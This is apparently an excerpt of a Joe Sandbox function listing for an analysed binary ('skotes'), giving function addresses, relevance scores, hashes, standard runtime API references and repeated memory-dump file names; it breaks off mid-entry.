Opcode Fuzzy Hash: 179f43bf7dc488b8c6fb2afc698fee60af60cbee9e70b22bbf2e69ab58504981
Instruction Fuzzy Hash: 12C25FB1E046288FDF25CE28DD407E9B3B5EB89315F1441EAE84DE7240E779AE819F40

Function 00FA2D10 Relevance: 3.4, APIs: 2, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3471949438.0000000000F61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000007.00000002.3471916677.0000000000F60000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3471949438.0000000000FC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472430333.0000000000FC9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000000FCB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001167000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001282000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.000000000128A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001298000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3475071025.0000000001299000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3475508599.000000000144D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3477381734.000000000144F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f60000_skotes.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3aca8a56400d0d9b6085cf2f602b9ddd120ff48a6058094a875459b271ae8c9e
Instruction ID: 7b6019eb376da5b008450d13914f4329588881e23bce862402ce1fd7fc88a4e7
Opcode Fuzzy Hash: 3aca8a56400d0d9b6085cf2f602b9ddd120ff48a6058094a875459b271ae8c9e
Instruction Fuzzy Hash: 2DF131B1E002199FDF14CFA8C9806ADFBB1FF49324F258269E915A7345D731AE41DB90

Function 00F7CBEA Relevance: 1.5, APIs: 1, Instructions: 16timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimePreciseAsFileTime.KERNEL32(?,00F7CF52,?,?,?,?,00F7CF87,?,?,?,?,?,?,00F7C4FD,?,00000001), ref: 00F7CC03

Memory Dump Source

Source File: 00000007.00000002.3471949438.0000000000F61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000007.00000002.3471916677.0000000000F60000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3471949438.0000000000FC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472430333.0000000000FC9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000000FCB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001167000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001282000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.000000000128A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001298000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3475071025.0000000001299000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3475508599.000000000144D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3477381734.000000000144F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f60000_skotes.jbxd

Yara matches

Similarity

API ID: Time$FilePreciseSystem
String ID:
API String ID: 1802150274-0
Opcode ID: 10d24d3c663baa5cf4718aadb13a54f75032feba26e78077b4c1a02a50bb2909
Instruction ID: 106e1c9bc3b5966f324a775b221a5e8c08345b42477c96b12cdf804e6668548c
Opcode Fuzzy Hash: 10d24d3c663baa5cf4718aadb13a54f75032feba26e78077b4c1a02a50bb2909
Instruction Fuzzy Hash: 36D02233A0203CA38A122B94EC088ADBB488F00B603018116E90C93120CF20ACC07FD2

Function 00F97F36 Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

0, xrefs: 00F980B2

Memory Dump Source

Source File: 00000007.00000002.3471949438.0000000000F61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000007.00000002.3471916677.0000000000F60000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3471949438.0000000000FC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472430333.0000000000FC9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000000FCB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001167000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001282000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.000000000128A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001298000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3475071025.0000000001299000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3475508599.000000000144D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3477381734.000000000144F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f60000_skotes.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
Instruction ID: 9c79985708b2ae948dcaf5d8147b9a0b1f6cf06db8b9d1ec7183add01ac67158
Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
Instruction Fuzzy Hash: A8519D31E187445AFF3C6A288C957BEB79A9F03398F140519E443F72A2CE169D4FB291

Function 00F64DE0 Relevance: .7, Instructions: 701COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3471949438.0000000000F61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000007.00000002.3471916677.0000000000F60000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3471949438.0000000000FC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472430333.0000000000FC9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000000FCB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001167000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001282000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.000000000128A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001298000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3475071025.0000000001299000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3475508599.000000000144D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3477381734.000000000144F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f60000_skotes.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a288ba9425b1e0675d4c1a4b7c309044fc7210f48c2e8a11584c5becf56d8827
Instruction ID: 4d3fa24bf5860600d737680634c111ef8f1e321708c036ec1a1996d45a7ec049
Opcode Fuzzy Hash: a288ba9425b1e0675d4c1a4b7c309044fc7210f48c2e8a11584c5becf56d8827
Instruction Fuzzy Hash: 5E2260B3F515144BDB0CCB9DDCA27EDB2E3AFD8218B0E803DA40AE3345EA79D9159644

Function 00FA7049 Relevance: .3, Instructions: 275COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3471949438.0000000000F61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000007.00000002.3471916677.0000000000F60000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3471949438.0000000000FC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472430333.0000000000FC9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000000FCB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001167000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001282000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.000000000128A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001298000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3475071025.0000000001299000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3475508599.000000000144D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3477381734.000000000144F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f60000_skotes.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f64620727645e8ae3ac0c641d72ce13a02f8d48d78186bec92e48b15f6dd68f5
Instruction ID: afb40c294963408ba1519219428a2e58986f66bd59068a35cb219e489ebe4108
Opcode Fuzzy Hash: f64620727645e8ae3ac0c641d72ce13a02f8d48d78186bec92e48b15f6dd68f5
Instruction Fuzzy Hash: 4DB14BB26147048FDB14DF28C886F657BE0FF46364F258658E899CF2A1C335E992DB40

Function 00F64B30 Relevance: .2, Instructions: 230COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3471949438.0000000000F61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000007.00000002.3471916677.0000000000F60000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3471949438.0000000000FC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472430333.0000000000FC9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000000FCB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001167000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001282000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.000000000128A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001298000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3475071025.0000000001299000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3475508599.000000000144D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3477381734.000000000144F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f60000_skotes.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cd170ada9df8754091f63840a4eb46313d3365d7520dd99a31f51ed493e4959
Instruction ID: 09fd3da0a8f13b1dd6a7f45a7fe43780cc08cb2431a20409ab0da52196ed0bf2
Opcode Fuzzy Hash: 8cd170ada9df8754091f63840a4eb46313d3365d7520dd99a31f51ed493e4959
Instruction Fuzzy Hash: 24813070E0024A8FEB15DF68D880BEEBBF1FB5A310F140269C850A7752C735A945EBA0

Function 00F7D3E2 Relevance: .2, Instructions: 172COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00F624BE

Memory Dump Source

Source File: 00000007.00000002.3471949438.0000000000F61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000007.00000002.3471916677.0000000000F60000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3471949438.0000000000FC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472430333.0000000000FC9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000000FCB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001167000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001282000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.000000000128A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001298000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3475071025.0000000001299000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3475508599.000000000144D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3477381734.000000000144F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f60000_skotes.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID:
API String ID: 2659868963-0
Opcode ID: 7752e8ae375562d69b3e1451db957f67ffaebae26e01cb3e5cb3eb4e005e6548
Instruction ID: 045acfc24f9c42b1f2e9bc029b7d7eab3c9ad0528891e64589b18eb76854259f
Opcode Fuzzy Hash: 7752e8ae375562d69b3e1451db957f67ffaebae26e01cb3e5cb3eb4e005e6548
Instruction Fuzzy Hash: 3451C072D0160A8BDB19CF59D986BADBBF0FF48324F24C56BD409EB250D734A940EB91

Function 00FA78BB Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3471949438.0000000000F61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000007.00000002.3471916677.0000000000F60000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3471949438.0000000000FC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472430333.0000000000FC9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000000FCB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001167000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001282000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.000000000128A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001298000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3475071025.0000000001299000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3475508599.000000000144D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3477381734.000000000144F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f60000_skotes.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66ea8b17706d411ca62cbecafcd2b2b8ca6c16b6d24793f6c8557c51fdb85ca4
Instruction ID: 6743950c7488b672c836ad91dc94416863dc1b547e456ecba492c9d87f0c6fa7
Opcode Fuzzy Hash: 66ea8b17706d411ca62cbecafcd2b2b8ca6c16b6d24793f6c8557c51fdb85ca4
Instruction Fuzzy Hash: 0121A473F2053947770CC47E8C52279B6E1878C541745823AE8A6EA2C1D968D917E2E4

Function 00FA779B Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3471949438.0000000000F61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000007.00000002.3471916677.0000000000F60000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3471949438.0000000000FC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472430333.0000000000FC9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000000FCB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001167000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001282000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.000000000128A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001298000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3475071025.0000000001299000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3475508599.000000000144D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3477381734.000000000144F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f60000_skotes.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65d099422e56989384daca18d1678ef9f5f47c1dfde2ed8b39eae997b49943e1
Instruction ID: 88ee89fd51e755261e7d6b95655e227fd2de51b416ecabcc4ffc6a639b507a0e
Opcode Fuzzy Hash: 65d099422e56989384daca18d1678ef9f5f47c1dfde2ed8b39eae997b49943e1
Instruction Fuzzy Hash: 33118A73F30C255B675C816D8C1727AA6D2DBD825071F533AD826E72C4E994DE13D290

Function 00FA8860 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3471949438.0000000000F61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000007.00000002.3471916677.0000000000F60000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3471949438.0000000000FC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472430333.0000000000FC9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000000FCB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001167000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001282000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.000000000128A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001298000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3475071025.0000000001299000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3475508599.000000000144D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3477381734.000000000144F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f60000_skotes.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 2d1bcbdc920bb8ba78f43a3e32dc7bad5fe0d485785178f7026cbaa16cd68a5f
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: A3115EF7A0118143E604863DC8B86BBE795EBC73717AD4379C0414B748CEAAD843B500

Function 00F9652B Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3471949438.0000000000F61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000007.00000002.3471916677.0000000000F60000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3471949438.0000000000FC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472430333.0000000000FC9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000000FCB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001167000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001282000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.000000000128A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001298000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3475071025.0000000001299000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3475508599.000000000144D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3477381734.000000000144F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f60000_skotes.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 095d93b28cf319a27fd06cb640141bd9d6a4d03b04591fb51ff621f1a0bf2182
Instruction ID: b06b0697c8811616af73df16bdec6ceb79aff518e90f55dbd1b1708f88d8355e
Opcode Fuzzy Hash: 095d93b28cf319a27fd06cb640141bd9d6a4d03b04591fb51ff621f1a0bf2182
Instruction Fuzzy Hash: BDE0C230542188AFDF2ABF99CD0DE583B2AFF11751F451810FD048A221CB3AED92EA80

Function 00F9A302 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3471949438.0000000000F61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000007.00000002.3471916677.0000000000F60000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3471949438.0000000000FC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472430333.0000000000FC9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000000FCB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001167000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001282000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.000000000128A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001298000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3475071025.0000000001299000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3475508599.000000000144D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3477381734.000000000144F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f60000_skotes.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction ID: 209ec4d145332aafed4e36de9a3eaa05138814a71b48bce704450507b1e60fb4
Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction Fuzzy Hash: E0E08C32921228EBCB15DF98D908D8AF3ECEB49B10B650096F901D3150C274DE00D7D0

Function 00F62EC0 Relevance: 7.8, APIs: 5, Instructions: 272COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00F62F5F
__Mtx_unlock.LIBCPMT ref: 00F62FCC
__Cnd_broadcast.LIBCPMT ref: 00F62FE3
__Mtx_unlock.LIBCPMT ref: 00F630F5
__Mtx_unlock.LIBCPMT ref: 00F6319B

Memory Dump Source

Source File: 00000007.00000002.3471949438.0000000000F61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000007.00000002.3471916677.0000000000F60000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3471949438.0000000000FC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472430333.0000000000FC9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000000FCB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001167000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001282000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.000000000128A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001298000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3475071025.0000000001299000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3475508599.000000000144D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3477381734.000000000144F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f60000_skotes.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Cnd_broadcast
String ID:
API String ID: 32384418-0
Opcode ID: 0bfc8092a6776149c93f5a263e78d7925ea41d9eb5fd02292a79930d2624ab61
Instruction ID: 6670f70d005bbcb21539b56faede868ac45f87f86fd033c7a1ec28b64ba32ee9
Opcode Fuzzy Hash: 0bfc8092a6776149c93f5a263e78d7925ea41d9eb5fd02292a79930d2624ab61
Instruction Fuzzy Hash: 81A1D3B1E01605AFDB10DF64CD44B5AB7B8FF15324F14812AE81AD7641EB35EA04EBD2

Function 00F9CBDF Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00F9CC66

Memory Dump Source

Source File: 00000007.00000002.3471949438.0000000000F61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000007.00000002.3471916677.0000000000F60000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3471949438.0000000000FC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472430333.0000000000FC9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000000FCB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001167000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001282000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.000000000128A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001298000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3475071025.0000000001299000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3475508599.000000000144D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3477381734.000000000144F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f60000_skotes.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 254d999fa369d06fd7d93151cbf4a8417e2da6d6341328512c40b930a69fa730
Instruction ID: 6e78fefa70eeb3d9288854bbaa257cd761fb05e251d38e6f17b6eba39a1c161a
Opcode Fuzzy Hash: 254d999fa369d06fd7d93151cbf4a8417e2da6d6341328512c40b930a69fa730
Instruction Fuzzy Hash: 0BB11432D042859FEF15DF28C8817AEBFE5EF45350F14416AE855EB242D6389D02EBE0

Function 00F7BB72 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 00F7BBCA
__Xtime_diff_to_millis2.LIBCPMT ref: 00F7BBE4
_xtime_get.LIBCPMT ref: 00F7BC07
__Xtime_diff_to_millis2.LIBCPMT ref: 00F7BC13

Memory Dump Source

